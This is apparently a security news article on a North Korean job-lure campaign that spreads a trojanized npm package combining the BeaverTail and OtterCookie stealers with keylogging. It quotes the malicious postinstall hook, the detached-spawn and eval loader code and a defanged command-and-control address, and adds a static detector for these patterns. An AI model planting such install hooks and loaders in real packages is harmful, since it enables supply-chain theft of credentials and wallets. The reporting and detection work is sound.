North Korean Hackers Using Malicious Scripts Combining BeaverTail and OtterCookie for Keylogging

Posted on October 16, 2025 By CWS

A new information stealer has emerged that targets job seekers with a trojanized Node.js application named Chessfi.

Delivered through a modified npm package hosted on the official repository, the malware blends two previously separate tools, BeaverTail and OtterCookie, into a unified JavaScript payload.

Victims are lured with fake job offers and asked to install the application under the guise of a coding assessment, unknowingly triggering malicious scripts that harvest credentials, cryptocurrency wallets and user activity.

Cisco Talos analysts identified the campaign while investigating unusual outbound traffic from a compromised system.

They found that a post-install script in the node-nvm-ssh package spawns a hidden child process that deobfuscates and evaluates a large JavaScript payload.

Node-nvm-ssh infection path (Source: Cisco Talos)

This payload merges BeaverTail's browser extension enumeration and InvisibleFerret Python downloader with OtterCookie's remote shell, file exfiltration, clipboard and now keylogging modules.

Once executed, the combined malware establishes a connection to a command-and-control server over socket.io.

The attacker can remotely issue commands, steal files matching a range of patterns, from .env and .docx to cryptocurrency extension directories, and execute shell commands.

Meanwhile, the keylogging component captures every keystroke and takes periodic desktop screenshots before uploading them to the C2 server along with clipboard contents.

Sustained network activity

Infected systems show sustained network activity on high-numbered TCP ports, typically 1418 for socket.io and 1478 for keylog uploads.

The malware creates a temporary folder named windows-cache and writes keystrokes to 1.tmp every second, while screenshots are saved as 2.jpeg every 4 seconds.

Using the Node.js packages node-global-key-listener, screenshot-desktop and sharp, the module configures listeners for key events and schedules screenshot captures, then bundles and sends the data to hxxp://172.86.88.188:1478/add.

The keylogger listens for keyboard and mouse key presses and saves them into a file (Source: Cisco Talos)

In addition to credential theft and remote shell access, the campaign's infection mechanism employs a multi-stage chain to evade detection. After the repository is cloned, a malicious postinstall script in package.json executes the skip script:

"scripts": {
  "postinstall": "npm run test && npm run transpile && npm run skip"
}

The skip command invokes node testfixtures/eval, which by default loads index.js. That script spawns a detached child process running file15.js:

const path = require('path');
const { spawn } = require('child_process');
const filePath = path.join(__dirname, 'node_modules', 'file15.js');
const child = spawn(process.execPath, [filePath], { detached: true, stdio: 'ignore' });

Finally, file15.js reads and evaluates the content of test.list using eval, revealing the combined BeaverTail and OtterCookie modules:

const fs = require('fs');
const path = require('path');
const filePath = path.join(__dirname, 'test.list');
fs.readFile(filePath, 'utf8', (err, data) => { eval(data); });

This convoluted chain, cloning a Git repository, running benign-looking npm scripts, spawning hidden processes and dynamically evaluating an obfuscated payload, underscores the sophistication of the infection mechanism.
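The three behaviours that chain relies on (an install-time hook chaining further npm scripts, a detached child process with its stdio discarded, and eval() applied to file contents) can be flagged statically before a package is ever installed. The following Node.js triage helper is an added example, not code from the article or from Cisco Talos; the sample inputs are constructed to mirror the snippets quoted above.

```javascript
// Added example (not from the article or Cisco Talos): static triage of an unpacked npm
// package for the behaviours this infection chain relies on. The samples at the bottom
// are constructed to mirror the article's snippets; point auditSource at real files in use.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Findings (array of strings, empty when clean) for a parsed package.json object.
function auditPackageJson(pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    const chained = cmd.match(/\bnpm run \S+/g) || [];
    if (chained.length) findings.push(`${hook}: chains ${chained.join(', ')}`);
    if (/\bnode\s+\S+/.test(cmd)) findings.push(`${hook}: runs node directly`);
  }
  return findings;
}

// Findings for the text of one JavaScript file. The spawn check accepts either order
// of the option keys; the eval check fires only when file contents are also read.
function auditSource(name, src) {
  const findings = [];
  if (/\bspawn\s*\(/.test(src) && /detached\s*:\s*true/.test(src) &&
      /stdio\s*:\s*['"]ignore['"]/.test(src)) {
    findings.push(`${name}: spawns a detached child with stdio ignored`);
  }
  if (/\breadFile(Sync)?\s*\(/.test(src) && /\beval\s*\(/.test(src)) {
    findings.push(`${name}: eval() applied to file contents`);
  }
  return findings;
}

// Constructed samples modelled on the article's snippets plus one benign file reader.
const SAMPLE_PACKAGE_JSON = {
  scripts: { postinstall: 'npm run test && npm run transpile && npm run skip', skip: 'node testfixtures/eval' },
};
const SAMPLE_INDEX = "const child = spawn(process.execPath, [filePath], { detached: true, stdio: 'ignore' });";
const SAMPLE_FILE15 = "fs.readFile(path.join(__dirname, 'test.list'), 'utf8', (err, data) => { eval(data); });";
const SAMPLE_BENIGN = "const cfg = JSON.parse(require('fs').readFileSync('config.json', 'utf8'));";

// Runs the audit over the samples; the benign reader produces no finding.
function auditSamples() {
  return [
    ...auditPackageJson(SAMPLE_PACKAGE_JSON),
    ...auditSource('index.js', SAMPLE_INDEX),
    ...auditSource('node_modules/file15.js', SAMPLE_FILE15),
    ...auditSource('lib/config.js', SAMPLE_BENIGN),
  ];
}
```

In practice, run auditPackageJson on the package's package.json and auditSource on every .js file beneath it, node_modules included, since the payload here was staged as node_modules/file15.js.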

By merging BeaverTail's stealthy Python payload downloader and OtterCookie's modular information stealer, Famous Chollima has crafted a versatile malware that leverages familiar developer workflows to compromise unsuspecting victims.
